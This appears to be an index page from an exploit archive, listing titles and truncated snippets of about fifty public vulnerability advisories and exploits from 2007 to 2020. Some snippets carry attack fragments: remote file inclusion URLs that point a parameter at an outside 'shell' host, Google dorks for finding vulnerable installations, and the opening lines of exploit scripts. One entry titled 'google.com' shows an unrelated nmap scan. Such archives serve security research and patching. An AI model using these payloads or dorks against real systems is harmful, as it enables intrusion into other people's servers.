Intel Network Adapter Diagnostic Driver - IOCTL Handling
Intel Network Adapter Diagnostic Driver - IOCTL Handling / Intel Network Adapter Diagnostic Driver IOCTL Handling Vulnerability Vendor: Intel Product webpage: http://www.intel.com Affected products: Network Adapter Driver for Windows XP Network Adapter Driver for Windows 7 Network Adapter Driver...
Advantech EKI-6340 - Command Injection
Advantech EKI-6340 - Command Injection Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Advantech EKI-6340 Command Injection 1. Advisory Information Title: Advantech EKI-6340 Command Injection Advisory ID: CORE-2014-0009 Advisory URL:...
CMS Made Simple 1.11.9 - Multiple Vulnerabilities
CMS Made Simple 1.11.9 - Multiple Vulnerabilities Vulnerabilities in CMS Made Simple, version 1.11.9 Discovered by Pedro Ribeiro [email protected] of Agile Information Security Reported to [email protected] and [email protected] Disclosure: 28/02/2014 / Last updated: 12/10/2014 CMS...
NRPE 2.15 - Remote Code Execution
NRPE 2.15 - Remote Code Execution !/usr/bin/python Exploit Title : NRPE http://www.abcompcons.com/files/nrpeclient.py pyOpenSSL Library required http://pyopenssl.sourceforge.net/ root@localhost pip-python install pyOpenSSL NRPE = 2.15 Remote Command Execution Vulnerability Release date: 17.04.201...
Linux Kernel 3.13 - SGID Privilege Escalation
Linux Kernel 3.13 - SGID Privilege Escalation / CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC Vitaly Nikolenko http://hashcrack.org Usage: ./poc filepath where filepath is the file on which you want to set the sgid bit / define GNUSOURCE include include include include include include...
Skybox Security 6.3.x 6.4.x - Multiple Information Disclosures
Skybox Security 6.3.x 6.4.x - Multiple Information Disclosures Exploit Title: SKYBOX Security – Multiple Information Disclosure Date: 22-Jan-2014 Exploit Author: Luigi Vezzoso Vendor Homepage: http://www.skyboxsecurity.com Version: Skybox View Appliances with ISO versions: 6.3.33-2.14, 6.3.31-2.1...
Dokeos 2.2 RC2 - index.php?language SQL Injection
Dokeos 2.2 RC2 - index.php?language SQL Injection Advisory ID: HTB23181 Product: Dokeos Vendor: Dokeos Vulnerable Versions: 2.2 RC2 and probably prior Tested Version: 2.2 RC2 Advisory Publication: October 30, 2013 without technical details Vendor Notification: October 30, 2013 Public Disclosure:...
BigTree CMS 4.0 RC2 - Multiple Vulnerabilities
BigTree CMS 4.0 RC2 - Multiple Vulnerabilities Advisory ID: HTB23165 Product: BigTree CMS Vendor: BigTree CMS Vulnerable Versions: 4.0 RC2 and probably prior Tested Version: 4.0 RC2 Vendor Notification: July 17, 2013 Vendor Patch: July 17, 2013 Public Disclosure: August 7, 2013 Vulnerability Type...
Symantec Web Gateway 5.1.0.x - Multiple Vulnerabilities
Symantec Web Gateway 5.1.0.x - Multiple Vulnerabilities SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple vulnerabilities - Surveillance via Symantec Web Gateway product: Symantec Web Gateway vulnerable version:...
Clipbucket 2.6 Revision 738 - Multiple SQL Injections
Clipbucket 2.6 Revision 738 - Multiple SQL Injections Advisory ID: HTB23125 Product: ClipBucket Vendor: clip-bucket.com Vulnerable Versions: 2.6 Revision 738 and probably prior Tested Version: 2.6 Revision 738 Vendor Notification: November 7, 2012 Vendor Patch: November 28, 2012 Public Disclosure...
Sysax FTP Automation Server 5.33 - Local Privilege Escalation
Sysax FTP Automation Server 5.33 - Local Privilege Escalation Title: Sysax FTP Automation Server Local Privilege Escalation Author: Craig Freyman @cd1zz OS Tested: XP SP3 32bit Version Tested: 5.33 Date Discovered: October 1, 2012 Vendor Contacted: October 21, 2012 Vendor Response: November 1, 20...
symantec Web gateway 5.0.2.8 - Multiple Vulnerabilities
symantec Web gateway 5.0.2.8 - Multiple Vulnerabilities Software: Symantec Web Gateway Current Software Version: 5.0.2.8 Product homepage: www.symantec.com Author: S2 Crew Hungary CVE: CVE-2012-0297, CVE-2012-0298, ??? File include:...
PHP 5.3.8 - Multiple Vulnerabilities
PHP 5.3.8 - Multiple Vulnerabilities -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 PHP 5.3.8 Multiple vulnerabilities Author: Maksymilian Arciemowicz Website: http://cxsecurity.com/ Date: 14.01.2012 CVE: CVE-2011-4153 zendstrndup Original link: http://cxsecurity.com/research/103 --- 1. Multiple...
Microsoft WINS - ECommEndDlg Input Validation Error (MS11-035/MS11-070)
Microsoft WINS - ECommEndDlg Input Validation Error MS11-035/MS11-070 Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ MS WINS ECommEndDlg Input Validation Error 1. Advisory Information Title: MS WINS ECommEndDlg Input Validation Error Advisory ID: CORE-2011-0526 Advisory URL:...
Adobe Photoshop CS5 - .gif Remote Code Execution
Adobe Photoshop CS5 - .gif Remote Code Execution Application: Adobe Photoshop CS5 GIF Remote Code Execution Platforms: Adobe Photoshop CS5 12.0 and 12.1 Exploitation: Remote code execution CVE Number: CVE-2011-2131 Adobe Vulnerability Identifier: APSB11-22 PRL: 2011-08 Author: Francis Provencher...
Apple Safari 5.0.5 - SVG Remote Code Execution (DEP Bypass)
Apple Safari 5.0.5 - SVG Remote Code Execution DEP Bypass Abysssec Public Advisory apple killed one of our 0day no point to keep it private anymore : there is another version of exploit using POPup and thats more reliable but as you know safari block pop up by default so we found a cool way to...
Microsoft Windows Explorer 6.0.2900.5512 - Shmedia.dll 6.0.2900.5512 AVI Preview Denial of Service (PoC)
Microsoft Windows Explorer 6.0.2900.5512 - Shmedia.dll 6.0.2900.5512 AVI Preview Denial of Service PoC done by BraniX www.hackers.org.pl found: 2011.03.27 published: 2011.03.29 tested on: Windows XP SP3 Home Edition tested on: Windows XP SP3 Professional Edition App: Windows Explorer 6.0.2900.551...
Majordomo2 - SMTPHTTP Directory Traversal
Majordomo2 - SMTPHTTP Directory Traversal Original Advisory: https://sitewat.ch/en/Advisory/View/1 Credit: Michael Brooks https://sitewat.ch Vulnerability: Directory Traversal Software: Majordomo2 Identifier:CVE-2011-0049 Vendor: http://www.mj2.org/ Affected Build: 20110121 and prior Google...
Pandora Fms 3.1 - SQL Injection
Pandora Fms 3.1 - SQL Injection + Introduction Pandora FMS for Pandora Flexible Monitoring System is a software solution for monitoring computer networks. It allows monitoring in a visual way the status and performance of several parameters from different operating systems, servers, applications...
textpattern CMS 4.2.0 - Remote File Inclusion
textpattern CMS 4.2.0 - Remote File Inclusion Remote File Inclusion Vulnerability ------------------------------------------------------------------------------ Textpattern index.php -------------------------------------------------------------- + Author : Sn!pEr.S!Te Hacker + Email :...
PHP-Nuke 7.0/8.1/8.1.35 - Wormable Remote Code Execution
PHP-Nuke 7.0/8.1/8.1.35 - Wormable Remote Code Execution !/usr/bin/php ?php / Wormable Remote Code Execution in PHP-Nuke 7.0/8.1/8.1.35 newest as of release Vendor's Website:http://phpnuke.org/ Security Researcher: Michael Brooks https://sitewat.ch Original Advisory:...
OpenSSL - Remote Denial of Service
OpenSSL - Remote Denial of Service / hoagieopensslrecordofdeath.c OPENSSL REMOTE DENIAL-OF-SERVICE EXPLOIT - OpenSSL 0.9.8m short = 16 bit - OpenSSL 0.9.8f through 0.9.8m short != 16 bit CVE-2010-0740 Bug discovered by: Bodo Moeller and Adam Langley Google Philip Olausson...
Joomla! Component com_rwcards - Local File Inclusion
Joomla! Component comrwcards - Local File Inclusion Author : altbta [email protected] Team : Sec Attack Team Home : www.v4-team.com/cc Script : Joomla Component comrwcards Bug Type : Local File Inclusion LFI Dork : inurl:"comrwcards" === Exploit ===...
IBM SolidDB - Invalid Error Code
IBM SolidDB - Invalid Error Code 1. Advisory Information Title: IBM SolidDB invalid error code vulnerability Advisory Id: CORE-2009-1027 Advisory URL: http://www.coresecurity.com/content/ibm-soliddb-errorcode-dos Date published: 2009-11-18 Date of last update: 2009-11-18 Vendors contacted: IBM...
BPLawyerCaseDocuments - SQL Injection
BPLawyerCaseDocuments - SQL Injection x========================================================================================================================================x | AntiSecuritydotorg |...
Amaya Web Editor 11.0 - XML HTML Parser
Amaya Web Editor 11.0 - XML HTML Parser -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Amaya web editor XML and HTML parser vulnerabilities 1. Advisory Information Title: Amaya web editor XML and HTML parser...
MKPortal 1.2.1 - Multiple Vulnerabilities
MKPortal 1.2.1 - Multiple Vulnerabilities waraxe-2009-SA070 - Multiple Vulnerabilities in MKPortal = 1.2.1 ============================================================================== Author: Janek Vind "waraxe" Date: 15. January 2009 Location: Estonia, Tartu Web:...
iziContents rc6 - LocalRemote File Inclusion
iziContents rc6 - LocalRemote File Inclusion o bug /". . . . .-' -...-'/ o o remote file inclusion: http://site/path/modules/search/search.php?languagehome=&rootdp=zZz&gsLanguage=http://shell? http://site/path/modules/poll/inlinepoll.php?languagehome=&rootdp=zZz&gsLanguage=http://shell?...
Linux Kernel 2.6.x - ALSA snd-page-alloc Local Proc File Information Disclosure
Linux Kernel 2.6.x - ALSA snd-page-alloc Local Proc File Information Disclosure / source: https://www.securityfocus.com/bid/25774/info / The Linux kernel is prone to a local privilege-escalation vulnerability. Exploiting this issue may allow local attackers to gain elevated privileges, facilitati...
Apache 1.3.34/1.3.33 (Ubuntu/Debian) - CGI TTY Privilege Escalation
Apache 1.3.34/1.3.33 Ubuntu/Debian - CGI TTY Privilege Escalation / :: Kristian Hermansen :: Date: 20070229 Description: Local attacker can influence Apache to direct commands into an open tty owned by user who started apache process, usually root. This results in arbitrary command execution...
nabopoll 1.2 - survey.inc.php?path Remote File Inclusion
nabopoll 1.2 - survey.inc.php?path Remote File Inclusion By Cr@zyKing [email protected] Thanks : ApAci & Erne & Uyussman & Eno7 & Thehacker & CrackersChild & Liz0zim Script : nabopoll 1.x Risk : Remote File Include | High Site : http://nabocorp.com/ Google Dork : inurl:"nabopoll/" Exploit :...
EncapsCMS 0.3.6 - corecore.php Remote File Inclusion
EncapsCMS 0.3.6 - corecore.php Remote File Inclusion Firewall encapscms 0.3.6 - Remote File Include by Firewall BuG FounD by Firewall Application Affect: encapscms 0.3.6 Source Code: http://scripts.ringsworld.com/content-management/encapscms-0.3.6.zip Code: includeonce$root."core/Config.php";...
EZContents 2.0.3 - showpoll.php?GLOBALS[admin_home] Remote File Inclusion
EZContents 2.0.3 - showpoll.php?GLOBALSadminhome Remote File Inclusion source: https://www.securityfocus.com/bid/19776/info ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker can exploit these...
Simple Machines Forum (SMF) 1.1 rc2 - Lock Topics
Simple Machines Forum SMF 1.1 rc2 - Lock Topics !/usr/bin/php -q -d shortopentag=on 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i;...
Kayako eSupport 2.3.1 - subd Remote File Inclusion
Kayako eSupport 2.3.1 - subd Remote File Inclusion Script: Kayako eSupport Comments: It seems like the vendor silently fixed the issue in the current version more like since v2.3.5 without warning users of previous versions, noobs. Requires that "registerglobals" is enabled. Vulnerable File:...
Limbo CMS 1.0.4.2 - catid SQL Injection
Limbo CMS 1.0.4.2 - catid SQL Injection i Limbo CMS option=weblinks sql injection exploit i coded by Oo Usage: ?host=hostname&path=limbopath&id=userid Exemple: ?host=127.0.0.1&path=/limbo&id=1 g Google: inurl:"index2.php?option=rss" OR "powered By Limbo CMS" /",$f && pregmatch"/login/",$f echo...
Mall23 - AddItem.asp SQL Injection
Mall23 - AddItem.asp SQL Injection source: https://www.securityfocus.com/bid/14898/info Mall23 is prone to an SQL injection vulnerability. This is due to a lack of proper sanitization of user-supplied input before using it in an SQL query. Successful exploitation could result in a compromise of t...
Multiple Vendor ICMP Implementation - Malformed Path MTU Denial of Service
Multiple Vendor ICMP Implementation - Malformed Path MTU Denial of Service source: https://www.securityfocus.com/bid/13124/info Multiple vendor implementations of TCP/IP Internet Control Message Protocol ICMP are reported prone to several denial-of-service attacks. ICMP is employed by network nod...
PHPSysInfo 2.02.1 - index.php LNG File Disclosure
PHPSysInfo 2.02.1 - index.php LNG File Disclosure source: https://www.securityfocus.com/bid/7286/info PHPSysInfo has been reported to be vulnerable to a file disclosure issue. Local users may be capable of influencing the include path for PHPSysinfo language include files. If the malicious langua...
RICOH Aficio SP 5210SF Printer - entryNameIn HTML Injection
RICOH Aficio SP 5210SF Printer - entryNameIn HTML Injection Exploit Title: RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection Discovery by: Olga Villagran Discovery Date: 2020-03-02 Vendor Homepage: https://www.ricoh.com/ Hardware Link:...
Joplin Desktop 1.0.184 - Cross-Site Scripting
Joplin Desktop 1.0.184 - Cross-Site Scripting Exploit Title: Joplin Desktop 1.0.184 - Cross-Site Scripting Exploit Author: Javier Olmedo Date: 2020-02-27 Vendor: Laurent Cozic Software Link: https://github.com/laurent22/joplin/archive/v1.0.184.zip Affected Version: 1.0.184 and before Patched...
Business Live Chat Software 1.0 - Cross-Site Request Forgery (Add Admin)
Business Live Chat Software 1.0 - Cross-Site Request Forgery Add Admin Exploit Title: Business Live Chat Software 1.0 - Cross-Site Request Forgery Add Admin Description: Operator Can Change Role User Type to admin Date: 2020-02-26 Exploit Author: Meisam Monsef Vendor Homepage:...
SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure
SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure Exploit Title: SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure Author: Todor Donev Date: 2020-02-23 Vendor: https://secu.jp/ Product Link: https://secu.jp/support/831nh1.html CVE: N/A SecuSTATION IPCAM-130 HD Came...
Cacti 1.2.8 - Remote Code Execution
Cacti 1.2.8 - Remote Code Execution Exploit Title: Cacti 1.2.8 - Remote Code Execution Date: 2020-02-03 Exploit Author: Askar @mohammadaskar2 CVE: CVE-2020-8813 Vendor Homepage: https://cacti.net/ Version: v1.2.8 Tested on: CentOS 7.3 / PHP 7.1.33 !/usr/bin/python3 import requests import sys impo...
Kronos WebTA 4.0 - Authenticated Remote Privilege Escalation
Kronos WebTA 4.0 - Authenticated Remote Privilege Escalation Exploit Title: Kronos WebTA 4.0 - Authenticated Remote Privilege Escalation Discovered by: Elwood Buck & Nolan B. Kennedy of Mindpoint Group Exploit Author: Nolan B. Kennedy nxkennedy Discovery date: 2019-09-20 Vendor Homepage:...
TotalAV 2020 4.14.31 - Privilege Escalation
TotalAV 2020 4.14.31 - Privilege Escalation Exploit Title: TotalAV 2020 4.14.31 - Privilege Escalation Date: 2020-01-09 Exploit Author: Kusol Watchara-Apanukorn Vendor Homepage: https://www.totalav.com/ Version: 4.14.31 Fixed on: 5.3.35 Tested on: Windows 10 x64 CVE : CVE-2019-18194 Vulnerability...
Adobe Acrobat Reader DC - Heap-Based Memory Corruption due to Malformed TTF Font
Adobe Acrobat Reader DC - Heap-Based Memory Corruption due to Malformed TTF Font We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- First chance exceptions are reported before any...
Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution
Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution Exploit Title: Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution Author: LiquidWorm Date: 2019-12-09 Product web page: https://www.inim.biz Link:...
google.com
Pentest notes for: google.com Exploit Pack Nmap 7.80 scan initiated Tue Dec 3 09:27:33 2019 as: /usr/bin/nmap -sV -A -oA log/exploitpack.com exploitpack.com Nmap scan report for exploitpack.com 132.148.22.104 Host is up 0.18s latency. rDNS record for 132.148.22.104:...
eMerge50P 5000P 4.6.07 - Remote Code Execution
eMerge50P 5000P 4.6.07 - Remote Code Execution Exploit Title: eMerge50P 5000P 4.6.07 - Remote Code Execution Google Dork: NA Date: 2018-11-11 Exploit Author: LiquidWorm Vendor Homepage: http://linear-solutions.com/nscfamily/e3-series/ Software Link: http://linear-solutions.com/nscfamily/e3-series...